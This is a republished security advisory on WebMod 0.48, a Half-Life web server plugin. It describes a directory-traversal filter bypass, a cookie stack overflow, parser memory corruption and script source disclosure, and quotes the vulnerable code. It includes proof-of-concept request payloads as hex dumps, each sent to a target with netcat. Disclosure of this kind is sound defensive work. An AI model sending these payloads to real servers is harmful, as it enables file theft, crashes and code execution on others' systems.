Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key).	WebMod Multiple Vulnerabilities 6 May 2008    Summary WebMod is "an open source MetaMod plugin which acts as a web server for Half-Life running on the equivalent TCP port of the UDP one used by the game". Multiple vulnerabilities have been discovered in WebMod, these allow remote attackers to crash the server as well as cause it to execute arbitrary code.   Credit: The information has been provided by Luigi Auriemma. The original article can be found at: http://aluigi.altervista.org/adv/webmodz-adv.txt Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * WebMod version 0.48 Directory traversal WebMod uses an anti-directory traversal check which searchs for any "../" pattern in the HTTP request of the client. So it's enough to use a "..\" pattern to bypass the check and being able to download any file from the disk where Half-Life is running included the configuration files of the game server (like ..\..\..\..\platform\config\server.vdf or ..\..\..\server.cfg). Note that this bug works only on Windows servers. From server.cpp: void clientHandle(int connfd, httpquery_t *query, int tid)     ...     if(strstr(str,"../")) // hack attempt, display index page     {         str[0]='\0';     } Cookie buffer-overflow A cookie parameter longer than MYSOCK_BUFLEN (8192) bytes leads to a stack based buffer-overflow. From server.cpp: void connectHandle(void *data) { char *input; char buf[MYSOCK_BUFLEN+1];             ...             for(j=0;input[i]&&input[i]!=';'&&input[i]!='\n';j++,i++)                 buf[j]=input[i]; parser.cpp arbitrary memory writing The functions in parser.cpp are affected by some memory corruption vulnerabilities with different effects depending by the type of variable/script used. In short a value longer than MAX_FILE_SIZE (16384) bytes can lead tothe writing of custom data in a custom memory address through strcat (auth.w?mode) or a NULL pointer (auth.w?redir) or an invalid memory access (the rconpass parameter of auth.w) and so on. Scripts source disclosure Adding a dot at the end of the requested URI allows the viewing of the script source code instead of executing it. This bug (which should work only on FAT/NTFS filesystems) can be considered a security vulnerability ONLY if the server runs custom scripts. Exploits: webmodz1.txt: 0000000 4547 2054 2e2f 5c2e 2e2e 2e5c 5c2e 2e2e 0000010 2e5c 5c2e 2e2e 2e5c 5c2e 2e2e 625c 6f6f 0000020 2e74 6e69 2069 5448 5054 312f 302e 0a0d 0000030 0a0d 0000032 nc SERVER PORT -v -v < webmodz1.txt webmodz2.txt 0000000 4547 2054 632f 6e6f 6966 2e67 2077 5448 0000010 5054 312f 302e 0a0d 6f43 6b6f 6569 203a 0000020 6372 6e6f 6170 7373 413d 4141 4141 4141 0000030 4141 4141 4141 4141 4141 4141 4141 4141 * 000b150 4141 4141 4141 4141 0d41 0d0a 000a 000b15d nc SERVER PORT -v -v < webmodz2.txt webmodz3.txt 0000000 4547 2054 612f 7475 2e68 3f77 6f6d 6564 0000010 413d 4141 4141 4141 4141 4141 4141 4141 0000020 4141 4141 4141 4141 4141 4141 4141 4141 * 0008cb0 2041 5448 5054 312f 302e 0a0d 0a0d 0008cbe nc SERVER PORT -v -v < webmodz3.txt webmodz4.txt 0000000 4547 2054 612f 7475 2e68 2e77 4820 5454 0000010 2f50 2e31 0d30 0d0a 000a 0000019 nc SERVER PORT -v -v < webmodz4.txt  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles SugarCRM Online Document Cross-Site Scripting (XSS) Vulnerability Skype URI Processing Arbitrary XML File Deletion Vulnerability Skype Protocol Handler Datapath Argument Injection Credential Disclosure Vulnerability LedgerSMB Multiple Vulnerabilities Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability Piwik Cookie Unserialize Vulnerability Invision Power Board SQL PHP File Inclusion and SQL Injection U.S. Defense Information Systems Agency (DISA) Unix Security Readiness Review (SRR) Vulnerability DevIL DICOM Buffer Overflow Vulnerability Marvell Driver Multiple Information Element Overflows HP Data Protector Express and Single Server Edition (SSE) DoS and Code Execution HP Color LaserJet Printers Unauthorized Access to Data and DoS KDE KDELibs Remote Array Overrun with Arbitrary Code Execution Gimp BMP Image Parsing Integer Overflow Vulnerability Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation  Featured Articles Microsoft Embedded OpenType Font Engine Heap Buffer Overflow (MS09-029) Virtualmin Multiple Vulnerabilities Microsoft WordPad Word97 Converter Stack Buffer Overflow Vulnerability (MS09-010) WordPress Unchecked Privileges in admin.php and Multiple Information Disclosures Microsoft PowerPoint Conversion Filter Heap Corruption Vulnerability (MS09-017) Adobe Shockwave Player Director File Parsing Pointer Overwrite Mozilla Firefox Java Applet Loading Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®